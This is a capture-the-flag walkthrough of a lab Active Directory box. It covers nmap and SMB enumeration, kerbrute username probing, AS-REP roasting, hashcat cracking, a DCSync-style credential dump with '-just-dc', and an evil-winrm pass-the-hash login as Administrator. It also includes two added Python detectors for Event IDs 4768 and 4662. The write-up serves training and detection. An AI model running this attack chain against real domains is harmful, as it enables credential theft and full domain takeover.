Attacktive Directory Walkthrough - Offensive Pentesting

Room Attacktive Directory
Target OS Windows
Difficulty Easy
Description 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
Maker Sq00ky


As always, the first step is the reconnaissance phase, beginning with port scanning.

Port Scanning

During this step we identify which services are exposed behind the target IP address.

nmap -sC -sV -oA nmap

53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-30 22:45:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-09-30T22:48:24+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-09-29T21:34:03
|_Not valid after:  2021-03-31T21:34:03
|_ssl-date: 2020-09-30T22:48:40+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerating Port 80

We can start by looking at the web server. It serves the default IIS page; we could run directory enumeration against it, but this box is about Active Directory, so let's move on.

The scan reveals the DNS domain name spookysec.local, which we add to the hosts file. A hosts entry needs the IP address first, then the name; the target IP is not shown in this writeup, so substitute it for the placeholder: echo "<TARGET-IP> spookysec.local" >> /etc/hosts

Enumerating SMB

Let's enumerate ports 139 and 445.


enum4linux -a spookysec.local

The Nmap output suggested the domain name was spookysec.local; enum4linux, however, shows THM-AD, which is the NetBIOS domain name Nmap also reported under rdp-ntlm-info.

enum4linux failed to provide much useful information, such as a list of users, so we use kerbrute to enumerate valid usernames against the KDC instead.


kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt

2020/10/01 04:50:02 >  [+] VALID USERNAME:       james@spookysec.local
2020/10/01 04:50:06 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2020/10/01 04:50:12 >  [+] VALID USERNAME:       James@spookysec.local
2020/10/01 04:50:14 >  [+] VALID USERNAME:       robin@spookysec.local
2020/10/01 04:50:36 >  [+] VALID USERNAME:       darkstar@spookysec.local
2020/10/01 04:50:50 >  [+] VALID USERNAME:       administrator@spookysec.local
2020/10/01 04:51:28 >  [+] VALID USERNAME:       backup@spookysec.local
2020/10/01 04:51:41 >  [+] VALID USERNAME:       paradox@spookysec.local
2020/10/01 04:53:01 >  [+] VALID USERNAME:       JAMES@spookysec.local
2020/10/01 04:53:28 >  [+] VALID USERNAME:       Robin@spookysec.local
2020/10/01 04:56:11 >  [+] VALID USERNAME:       Administrator@spookysec.local
2020/10/01 05:02:01 >  [+] VALID USERNAME:       Darkstar@spookysec.local
2020/10/01 05:03:55 >  [+] VALID USERNAME:       Paradox@spookysec.local
2020/10/01 05:10:02 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
2020/10/01 05:11:51 >  [+] VALID USERNAME:       ori@spookysec.local
2020/10/01 05:15:01 >  [+] VALID USERNAME:       ROBIN@spookysec.local

Exploiting Kerberos

We now want to crack Active Directory passwords with AS-REP Roasting. This is an attack against Kerberos that targets user accounts with pre-authentication disabled: for such an account the KDC returns an AS-REP without any proof of the password, and part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline.

python /opt/impacket/examples/ spookysec.local/ -usersfile valid-users.txt
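The two Kerberos steps above (kerbrute username enumeration and AS-REP roasting) each leave a distinctive trace on the Domain Controller. The following is an added example, not part of the original walkthrough, showing how a defender would pick both out of the DC's security log and how to find roastable accounts before an attacker does. It assumes each event is a dict carrying the fields of Windows Event ID 4768 ("A Kerberos authentication ticket (TGT) was requested"): TargetUserName, IpAddress, Status, PreAuthType and TicketEncryptionType. The IP addresses and userAccountControl values are constructed sample data, not captured from the lab box.

```python
"""Added example (not from the original walkthrough): reading Event ID 4768
for signs of username enumeration and AS-REP roasting, plus the
userAccountControl check that lists accounts with pre-auth disabled.

Assumption: events are dicts with the 4768 field names listed below.
All sample data is constructed."""
from collections import defaultdict

# userAccountControl bit that disables Kerberos pre-authentication
DONT_REQ_PREAUTH = 0x400000


def _ev(user, ip, status, preauth="2", etype="0x12"):
    """Build one constructed 4768 event (defaults: pre-auth used, AES256 ticket)."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


SCANNER = "10.10.14.5"       # constructed: host running the enumeration tools
WORKSTATION = "10.10.1.20"   # constructed: an ordinary domain workstation

SAMPLE_4768 = [
    # Normal logons: pre-auth performed, AES ticket issued.
    _ev("robin", WORKSTATION, "0x0"),
    _ev("james", WORKSTATION, "0x0"),
    # Username probing: names that do not exist get Status 0x6
    # (KDC_ERR_C_PRINCIPAL_UNKNOWN), one failure per guessed name.
    *[_ev(n, SCANNER, "0x6") for n in
      ("aaron", "abby", "adam", "alex", "amy", "andy", "anna")],
    # AS-REP roast: pre-auth is disabled on svc-admin, so the KDC issues a
    # TGT (Status 0x0) with PreAuthType 0 and an RC4 (0x17) ticket, the
    # encryption type that hashcat mode 18200 cracks.
    _ev("svc-admin", SCANNER, "0x0", preauth="0", etype="0x17"),
]

# Constructed userAccountControl values as an LDAP query would return them.
SAMPLE_UAC = {"svc-admin": 0x400200, "james": 0x10200, "robin": 0x200}


def asrep_roast_candidates(events):
    """Successful 4768 with PreAuthType 0: a TGT was issued without pre-auth,
    which is the condition AS-REP roasting relies on."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"]


def enumeration_sources(events, threshold=5):
    """Map source IP -> number of distinct unknown principals it tried, for
    sources at or above the threshold. Names are lower-cased because kerbrute
    reports james/James/JAMES as separate hits although they are one account."""
    unknown = defaultdict(set)
    for e in events:
        if e["Status"] == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(names) for ip, names in unknown.items()
            if len(names) >= threshold}


def accounts_without_preauth(uac_by_user):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set; these are
    the roastable accounts, so they are the ones to fix."""
    return sorted(u for u, uac in uac_by_user.items() if uac & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    print("AS-REP issued without pre-auth:", asrep_roast_candidates(SAMPLE_4768))
    print("Likely enumeration sources:", enumeration_sources(SAMPLE_4768))
    print("Accounts with pre-auth disabled:", accounts_without_preauth(SAMPLE_UAC))
```

The enumeration heuristic keys on the burst of 0x6 failures from one source rather than on any single event, because a handful of mistyped usernames is normal; the AS-REP check needs no threshold, since a successful TGT request with PreAuthType 0 should not happen at all once pre-authentication is re-enabled on every account that accounts_without_preauth reports.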


Let's crack the hash using hashcat and then log in to SMB.

hashcat -m 18200 svc-admin.txt /usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt --force

"-m 18200" specifies the hash mode we want to use. See the Hashcat Wiki for the full list of modes:

Hashcat Wiki

Alternatively, you can use john:

john svc-admin.txt --wordlist=/usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt

Running john or hashcat will give us a password.

Enumerating the DC (Domain Controller)

With the password recovered in the previous step, we use those credentials to log in to the SMB shares.

smbclient -L // --user svc-admin

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share

We found several shares, and backup looks interesting.

We found the backup_credentials.txt file inside the backup share.

Let's take a look at what it contains.


The contents are base64 encoded.

Decoding them gives another set of credentials, this time for the backup user.

Elevating Privileges

python -just-dc backup@spookysec.local

Dumping this reveals the Administrator NTLM hash. We can now either crack the hash or use evil-winrm with the hash to connect as Administrator.

./evil-winrm.rb -i -u Administrator -H (HASH HERE)
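The -just-dc step above pulls account secrets through the directory replication protocol (DRSUAPI), the same channel a peer Domain Controller uses, so on the targeted DC it shows up as Event ID 4662 ("An operation was performed on an object") whose Properties field carries the replication control-access GUIDs. The following is an added example, not part of the original walkthrough, of flagging such a request when it comes from a principal that is not a known replication partner. It assumes events are dicts with the 4662 fields SubjectUserName, ObjectServer, AccessMask and Properties, and that the defender keeps an allow-list of accounts (normally the other DCs' machine accounts) that may replicate; the sample events are constructed, not captured from the lab box.

```python
"""Added example (not from the original walkthrough): flagging Event ID 4662
entries in which a principal outside the replication allow-list exercised a
directory-replication extended right, the footprint of a "-just-dc" dump.

Assumption: events are dicts with the 4662 field names used below.
All sample data is constructed."""

# Extended-right GUIDs that legitimate replication partners hold.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Access mask bit set when an extended (control-access) right is exercised.
CONTROL_ACCESS = 0x100


def _ev(subject, properties, access_mask="0x100"):
    """Build one constructed 4662 event against the directory service."""
    return {"SubjectUserName": subject, "ObjectServer": "DS",
            "AccessMask": access_mask, "Properties": properties}


SAMPLE_4662 = [
    # A peer DC replicating: expected, and on the allow-list.
    _ev("DC02$", "{%s} {%s}" % (DS_REPLICATION_GET_CHANGES,
                                 DS_REPLICATION_GET_CHANGES_ALL)),
    # An ordinary read of a directory object: unrelated GUID, read-only mask
    # (the GUID is a placeholder constructed for this sample).
    _ev("robin", "{00000000-1111-2222-3333-444444444444}", access_mask="0x10"),
    # A user account exercising Get-Changes-All: the request behind "-just-dc".
    _ev("backup", "{%s}" % DS_REPLICATION_GET_CHANGES_ALL),
]


def _guids(properties):
    """Normalise the space-separated '{guid} {guid}' Properties string."""
    return {p.strip("{}").lower() for p in properties.split()}


def dcsync_suspects(events, allowed_replicators):
    """Return (subject, sorted matched GUIDs) for every 4662 event in which a
    principal outside the allow-list exercised a replication extended right."""
    allowed = {a.lower() for a in allowed_replicators}
    hits = []
    for e in events:
        if e["ObjectServer"] != "DS":
            continue
        if int(e["AccessMask"], 16) & CONTROL_ACCESS == 0:
            continue
        matched = _guids(e["Properties"]) & REPLICATION_GUIDS
        if matched and e["SubjectUserName"].lower() not in allowed:
            hits.append((e["SubjectUserName"], sorted(matched)))
    return hits


if __name__ == "__main__":
    for subject, guids in dcsync_suspects(SAMPLE_4662, {"DC02$"}):
        print(f"replication right used by non-DC principal {subject}: {guids}")
```

Auditing 4662 for these two GUIDs requires the "Directory Service Access" audit subcategory to be enabled on the DC; without it the event is never written, which is why the allow-list approach is paired with a periodic review of which principals actually hold the replication rights on the domain object.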